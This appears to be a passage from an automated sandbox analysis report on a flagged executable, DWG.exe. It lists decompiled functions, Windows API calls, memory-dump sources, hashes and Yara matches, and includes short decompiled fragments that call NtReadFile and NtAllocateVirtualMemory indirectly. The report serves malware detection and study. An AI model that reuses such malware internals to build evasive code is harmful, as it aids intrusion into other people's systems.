                                      • Instruction Fuzzy Hash: CAE01A70C08214DBE710AF65EC4835A3BA0EB82311F108837E486A6271E7B89C80DF9F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043767A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00438F7B: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0043CC56,00000009,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 00438FB8
                                        • Part of subcall function 00438F7B: EnterCriticalSection.KERNEL32(?,?,?,0043CC56,00000009,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 00438FD3
                                      • GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,0043686B), ref: 004376CB
                                        • Part of subcall function 00438FDC: LeaveCriticalSection.KERNEL32(?,004354B5,00000009,?,00000009,00000000,?,00435475,000000E0,00435462,?,00438F9B,00000018,00000000,?), ref: 00438FE9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CriticalSection$EnterInfoInitializeLeave
                                      • String ID: HF$XF
                                      • API String ID: 1866836854-646221050
                                      • Opcode ID: c6a9f1f7cccdd5da812d37f0800123dd8155f59e4698be3e0fa1f849575e7ef3
                                      • Instruction ID: f39753f84d48a2ed3f28ce5f36f26a9c350bc32ec5d06f3c8928e016bd48fc45
                                      • Opcode Fuzzy Hash: c6a9f1f7cccdd5da812d37f0800123dd8155f59e4698be3e0fa1f849575e7ef3
                                      • Instruction Fuzzy Hash: E64186B190C2819EEB35DB38CC8536A7B90AB0C318F24647FE5C997291C7BD48858B4D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004378CD, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCPInfo.KERNEL32(?,00000000), ref: 004378E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Info
                                      • String ID: $
                                      • API String ID: 1807457897-3032137957
                                      • Opcode ID: 397af864cd0f2db1fcb69d81cfd713cb4496fdeceaadf46acc02d4caa7251d2e
                                      • Instruction ID: 49d30ddff10ff31b58ae4e71c5700e9fac701cbe5ec942c122374422679f7409
                                      • Opcode Fuzzy Hash: 397af864cd0f2db1fcb69d81cfd713cb4496fdeceaadf46acc02d4caa7251d2e
                                      • Instruction Fuzzy Hash: 8A419DB00082981EEB369710CE59FFB7F99DB09700F1428E6D1C9D7152C2A94E44C7AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043F4CB, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0043E526: SetFilePointer.KERNEL32(00000000,?,00000000,00000000,00000000,?,0043AAD0,?,00000000,00000002,00000001,?,18E8F04D), ref: 0043E550
                                        • Part of subcall function 0043E526: GetLastError.KERNEL32 ref: 0043E55D
                                      • SetEndOfFile.KERNEL32(00000000,?,?,?,00000100,?,?,?,0043E43D,00000000,00000040), ref: 0043F5A8
                                      • GetLastError.KERNEL32(?,?,?,00000100,?,?,?,0043E43D,00000000,00000040), ref: 0043F5C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ErrorFileLast$Pointer
                                      • String ID: =C
                                      • API String ID: 1697706070-1630774198
                                      • Opcode ID: 53075e7f5276adc774f65d359c5c73ea1f0e2b32b6b68f97322666287c7b0fcf
                                      • Instruction ID: 1571ce1a920cda114943dfa8a0a5a0ee5d1dff03d79d33ef405b65b9f4806e97
                                      • Opcode Fuzzy Hash: 53075e7f5276adc774f65d359c5c73ea1f0e2b32b6b68f97322666287c7b0fcf
                                      • Instruction Fuzzy Hash: F831E772D011187BCF212FA5CC05B8D7A64DF0C368F105177F9189A2E2EA79DE49869D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004114AD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDriveTypeA.KERNEL32 ref: 004114F9
                                      • GetVolumeInformationA.KERNEL32(00000000,?,000000C8,00000000,00000000,00000000,?,00000032), ref: 00411594
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: DriveInformationTypeVolume
                                      • String ID: %s (%s)
                                      • API String ID: 3149825354-1363028141
                                      • Opcode ID: dbfc93d42c4cb7481d6521219dda1b3141f3433a07f5a61e2dd8b37464bf8cf6
                                      • Instruction ID: 4a1e0a255166fe4b5b330b30b86dd96cf94ea14925c085261e896a0e202ca46e
                                      • Opcode Fuzzy Hash: dbfc93d42c4cb7481d6521219dda1b3141f3433a07f5a61e2dd8b37464bf8cf6
                                      • Instruction Fuzzy Hash: 2F41B271900259ABDB14DF94DC51BEAB378EB09704F0046ABE20563291EB786B89CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043440F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ChildLongWindow
                                      • String ID: 0
                                      • API String ID: 1178903432-4108050209
                                      • Opcode ID: a902183169456247e215e5b721f9b0c7285cf09b1bbe427c5508e197e4b18b62
                                      • Instruction ID: 1b5b50ce9eb1b1bac7614952e3c3118833895424da258f8d39225c6dcde1b29b
                                      • Opcode Fuzzy Hash: a902183169456247e215e5b721f9b0c7285cf09b1bbe427c5508e197e4b18b62
                                      • Instruction Fuzzy Hash: 4E21D1312056107ADB21AA255D81FEF62AC9FEC355F28B13BFC04A2282DB3CFD41856C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004114DB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDriveTypeA.KERNEL32 ref: 004114F9
                                      • GetVolumeInformationA.KERNEL32(00000000,?,000000C8,00000000,00000000,00000000,?,00000032), ref: 00411594
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: DriveInformationTypeVolume
                                      • String ID: %s (%s)
                                      • API String ID: 3149825354-1363028141
                                      • Opcode ID: fed8825a6174eb6a5e6e6b183c4e4ac5e771278613ecdc07685e8fe917e4e4a9
                                      • Instruction ID: c4cee799b4bde78382e28564e52fb79fbe02146753b83fc5d9abec2566b03c4e
                                      • Opcode Fuzzy Hash: fed8825a6174eb6a5e6e6b183c4e4ac5e771278613ecdc07685e8fe917e4e4a9
                                      • Instruction Fuzzy Hash: 07318F719002599FDB14DB94DC51BEEB774AB09304F0089EAE20A73291EB746B89CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00444630, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00446FC7: GetWindowLongA.USER32 ref: 00446FD3
                                      • GetWindowRect.USER32 ref: 00444655
                                      • GetWindow.USER32(?,00000004), ref: 00444672
                                        • Part of subcall function 00447123: IsWindowEnabled.USER32(?), ref: 0044712D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$EnabledLongRect
                                      • String ID: (HD
                                      • API String ID: 3170195891-2148437710
                                      • Opcode ID: 81b53796cbe4c2ab622f19b9ba17926e80b083f7fad4096be9b1156554e78074
                                      • Instruction ID: ae6bd5038afdf9cdeb7ebe7558c0fadb38a600f0acd1a88e527810df72ccc1c6
                                      • Opcode Fuzzy Hash: 81b53796cbe4c2ab622f19b9ba17926e80b083f7fad4096be9b1156554e78074
                                      • Instruction Fuzzy Hash: A2017C302006049BEF21EB25CD06B6F77A9AFA3314F02441AED41A7791DB3CEC158698
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043E840, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDriveTypeA.KERNEL32(?,?,0043E782,?,?), ref: 0043E85F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: DriveType
                                      • String ID: :$\
                                      • API String ID: 338552980-1166558509
                                      • Opcode ID: 7506d28b6cc730651ead06a33dbf0ef10f4a59496ffb11cfa6468eb98a132906
                                      • Instruction ID: b4095f3dc829ddb8c3df49ec82b68750fb39568e5d0cc0986cc31564e8cf6e83
                                      • Opcode Fuzzy Hash: 7506d28b6cc730651ead06a33dbf0ef10f4a59496ffb11cfa6468eb98a132906
                                      • Instruction Fuzzy Hash: DDE0D83120838C59EF019EB6D44478A3F889B05784F08C057F80CCE281D174D641C35A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004419E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameA.USER32(?,?,00000010), ref: 004419FE
                                      • lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 00441A0E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ClassNamelstrcmp
                                      • String ID: ComboBox
                                      • API String ID: 3770760073-1152790111
                                      • Opcode ID: c9ac7c9c47adff2366ad3702e425702c68838c6a1ce4ea41fac9e33caaa18a8c
                                      • Instruction ID: 00fb7ca4f4edb7a6fc5d44ab6f70956aee28c8685d7d8cd8936ef68ef85914e9
                                      • Opcode Fuzzy Hash: c9ac7c9c47adff2366ad3702e425702c68838c6a1ce4ea41fac9e33caaa18a8c
                                      • Instruction Fuzzy Hash: 9FE04F707103005BE724AB249C09B6A32E4F754703F880E58F559E21B1FBB9D594865A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044CF93, Relevance: 5.1, APIs: 4, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 0044CFF0
                                      • LeaveCriticalSection.KERNEL32(?,?), ref: 0044D000
                                      • LocalFree.KERNEL32(?), ref: 0044D009
                                      • TlsSetValue.KERNEL32(?,00000000), ref: 0044D01F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                      • String ID:
                                      • API String ID: 2949335588-0
                                      • Opcode ID: 5fff76efc4fafcfddbd1f6ed8f2f221dc9ba574479bc3ced4b3ad8605a86d01f
                                      • Instruction ID: 97a1d3c6ec35dd13cdc6787b2de82705d45a7dfe4c54d2faf67daaddca842d1a
                                      • Opcode Fuzzy Hash: 5fff76efc4fafcfddbd1f6ed8f2f221dc9ba574479bc3ced4b3ad8605a86d01f
                                      • Instruction Fuzzy Hash: B121AC31202300EFE7208F45D884FAA77A6FF45716F04846AF5029B6A2C779ED45DB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044D553, Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(004713A8,?,00000000,?,?,0044D13B,00000010,?,00000000,?,?,?,0044C6AC,0044C70F,0044BFA0,0044C6B2), ref: 0044D58E
                                      • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,0044D13B,00000010,?,00000000,?,?,?,0044C6AC,0044C70F,0044BFA0,0044C6B2), ref: 0044D5A0
                                      • LeaveCriticalSection.KERNEL32(004713A8,?,00000000,?,?,0044D13B,00000010,?,00000000,?,?,?,0044C6AC,0044C70F,0044BFA0,0044C6B2), ref: 0044D5A9
                                      • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,0044D13B,00000010,?,00000000,?,?,?,0044C6AC,0044C70F,0044BFA0,0044C6B2,00448804), ref: 0044D5BB
                                        • Part of subcall function 0044D4C0: GetVersion.KERNEL32(?,0044D563,?,0044D13B,00000010,?,00000000,?,?,?,0044C6AC,0044C70F,0044BFA0,0044C6B2,00448804,0044A2B4), ref: 0044D4D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CriticalSection$Enter$InitializeLeaveVersion
                                      • String ID:
                                      • API String ID: 1193629340-0
                                      • Opcode ID: 22c3643d2fd531c057fd5072e437a8274add4ee3775240facac5d792a31aa049
                                      • Instruction ID: 79d820d1fa968b498018773431558678df3a25a3eb805de74deb1cfe2c9b71e1
                                      • Opcode Fuzzy Hash: 22c3643d2fd531c057fd5072e437a8274add4ee3775240facac5d792a31aa049
                                      • Instruction Fuzzy Hash: 92F04F7580125AEFEB10DF5DEC84952B3ADFB6031AB000437EA0A93531DB35B595CA6C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00438F52, Relevance: 5.0, APIs: 4, Instructions: 12COMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeCriticalSection.KERNEL32(?,00438572,?,0043683B), ref: 00438F5F
                                      • InitializeCriticalSection.KERNEL32(?,00438572,?,0043683B), ref: 00438F67
                                      • InitializeCriticalSection.KERNEL32(?,00438572,?,0043683B), ref: 00438F6F
                                      • InitializeCriticalSection.KERNEL32(?,00438572,?,0043683B), ref: 00438F77
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CriticalInitializeSection
                                      • String ID:
                                      • API String ID: 32694325-0
                                      • Opcode ID: 12cffa5d83c66f5025a9d2d97134b505056e9475f5f36922ff8d8c4db7c825e3
                                      • Instruction ID: 1911e4dee6ba7719050be36a5cf963a465d52c641339958a66baff5b97548d41
                                      • Opcode Fuzzy Hash: 12cffa5d83c66f5025a9d2d97134b505056e9475f5f36922ff8d8c4db7c825e3
                                      • Instruction Fuzzy Hash: 2AC00275800238AFCF112B57FC048853FA6EB142637554173F1055507096A25C51DFD9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: DWG.exe PID: 6240 Parent PID: 6272 DWG.exeCOMMON

                                      Executed Functions

                                      Function 0041868C, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 23%
                                      			E0041868C(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t20;
				void* _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				asm("cmc");
				_t15 = _a4;
				_t31 = _a4 + 0xc48;
				E004191E0(_t29, _t15, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t20 =  *((intOrPtr*)( *_t31))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t30, _t33); // executed
				return _t20;
			}








                                      0x0041868c
                                      0x00418693
                                      0x0041869f
                                      0x004186a7
                                      0x004186ac
                                      0x004186b2
                                      0x004186cd
                                      0x004186d5
                                      0x004186d9

                                      APIs
                                      • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1:A$r=A$r=A
                                      • API String ID: 2738559852-4243674446
                                      • Opcode ID: 69451c0001bfe70dfe1486e7fcf4de248ecf282a3a63d37af44124ecc26c6108
                                      • Instruction ID: aca1f407819d339c3a7a792f070342dfcb36f705680f473d60106b7526c8bdf0
                                      • Opcode Fuzzy Hash: 69451c0001bfe70dfe1486e7fcf4de248ecf282a3a63d37af44124ecc26c6108
                                      • Instruction Fuzzy Hash: F7F0F4B2200109AFDB04CF99DC81EEB77A9AF8C354F118249FA0DD7244C630EC51CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                      0x00418693
                                      0x0041869f
                                      0x004186a7
                                      0x004186ac
                                      0x004186b2
                                      0x004186cd
                                      0x004186d5
                                      0x004186d9

                                      APIs
                                      • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1:A$r=A$r=A
                                      • API String ID: 2738559852-4243674446
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041883A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74memorynativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.378652760.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378679115.000000000041D000.00000040.00020000.sdmp Download File
                                      • Associated: 00000005.00000002.378686607.000000000041E000.00000020.00020000.sdmp Download File
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID: I~A
                                      • API String ID: 2167126740-812468771
                                      • Opcode ID: af3eb81bfb912dbaf04c6935011f1f7dc6a3166b630e70b6a4ec00884b533e9c
                                      • Instruction ID: 8cfbee5a14667e63e30d7ecc8199fa9f23ba6b3f0093c7f6a0c2037dec6c376c
                                      • Opcode Fuzzy Hash: af3eb81bfb912dbaf04c6935011f1f7dc6a3166b630e70b6a4ec00884b533e9c
                                      • Instruction Fuzzy Hash: 0F1126B6200219AFDB14EF88DC85EEB77ADEF88750F108559FA1897241CA30E950CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418632, Relevance: 1.6, APIs: 1, Instructions: 55filenativeCOMMON
                                      Download Yara Rule
                                      APIs
